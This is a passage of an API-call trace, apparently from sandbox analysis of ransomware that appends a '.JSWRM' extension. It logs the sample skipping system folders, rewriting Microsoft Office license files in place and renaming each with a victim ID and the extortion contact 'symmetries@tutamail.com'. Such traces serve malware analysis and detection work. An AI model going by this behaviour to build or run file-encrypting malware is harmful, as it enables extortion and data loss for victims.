lstrcmpiW (lpString1="HomeBusinessR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0103.638] lstrcmpiW (lpString1="HomeBusinessR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0103.638] lstrcmpiW (lpString1="HomeBusinessR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.638] lstrcmpiW (lpString1="HomeBusinessR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0103.638] lstrcmpiW (lpString1="HomeBusinessR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0103.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0103.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0103.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0103.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0103.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0103.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0103.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0103.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0103.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0103.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0103.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.639] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0103.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.639] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11621) returned 1 [0103.639] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0103.639] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0103.641] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.641] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0103.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.642] CloseHandle (hObject=0x45c) returned 1 [0103.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0103.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0103.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0103.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0103.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0103.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0103.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.642] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0103.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0103.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0103.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.643] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe41a69d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe41a69d5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe42b1a78, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ba3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Trial2-pl.xrm-ms", cAlternateFileName="HO87DE~1.XRM")) returned 1 [0103.643] lstrcmpiW (lpString1="HomeBusinessR_Trial2-pl.xrm-ms", lpString2=".") returned 1 [0103.643] lstrcmpiW (lpString1="HomeBusinessR_Trial2-pl.xrm-ms", lpString2="..") returned 1 [0103.644] lstrcmpiW (lpString1="HomeBusinessR_Trial2-pl.xrm-ms", lpString2="...") returned 1 [0103.644] lstrcmpiW (lpString1="HomeBusinessR_Trial2-pl.xrm-ms", lpString2="windows") returned -1 [0103.644] lstrcmpiW (lpString1="HomeBusinessR_Trial2-pl.xrm-ms", lpString2="recovery") returned -1 [0103.644] lstrcmpiW (lpString1="HomeBusinessR_Trial2-pl.xrm-ms", lpString2="perflogs") returned -1 [0103.644] lstrcmpiW (lpString1="HomeBusinessR_Trial2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0103.644] lstrcmpiW (lpString1="HomeBusinessR_Trial2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.644] lstrcmpiW (lpString1="HomeBusinessR_Trial2-pl.xrm-ms", lpString2="system volume information") returned -1 [0103.644] lstrcmpiW (lpString1="HomeBusinessR_Trial2-pl.xrm-ms", lpString2="msocache") returned -1 [0103.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0103.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial2-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0103.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0103.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial2-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240ef8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Trial2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0103.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0103.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0103.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial2-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0103.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0103.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial2-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Trial2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0103.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0103.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0103.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0103.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.644] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0103.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.645] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11171) returned 1 [0103.645] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0103.645] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0103.674] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.674] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0103.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.674] CloseHandle (hObject=0x45c) returned 1 [0103.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0103.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0103.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0103.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0103.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0103.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0103.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.675] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0103.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0103.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0103.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0103.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0103.677] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe423f37b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe423f37b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4370671, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x56c7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Trial2-ppd.xrm-ms", cAlternateFileName="HOE683~1.XRM")) returned 1 [0103.677] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ppd.xrm-ms", lpString2=".") returned 1 [0103.677] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ppd.xrm-ms", lpString2="..") returned 1 [0103.677] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ppd.xrm-ms", lpString2="...") returned 1 [0103.677] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ppd.xrm-ms", lpString2="windows") returned -1 [0103.677] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ppd.xrm-ms", lpString2="recovery") returned -1 [0103.677] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ppd.xrm-ms", lpString2="perflogs") returned -1 [0103.677] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0103.677] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.677] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0103.677] lstrcmpiW (lpString1="HomeBusinessR_Trial2-ppd.xrm-ms", lpString2="msocache") returned -1 [0103.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0103.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial2-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0103.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0103.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial2-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240ef8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Trial2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0103.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0103.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0103.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial2-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0103.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0103.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Trial2-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Trial2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0103.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0103.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0103.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0103.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0103.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.678] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22215) returned 1 [0103.678] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x56c0) returned 0x24c1d0 [0103.678] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x56c0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x56c0, lpOverlapped=0x0) returned 1 [0103.681] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.681] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x56c0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x56c0, lpOverlapped=0x0) returned 1 [0103.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.681] CloseHandle (hObject=0x45c) returned 1 [0103.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0103.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0103.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0103.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0103.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0103.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0103.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.682] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Trial2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_trial2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0103.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0103.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0103.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0103.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0103.683] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, 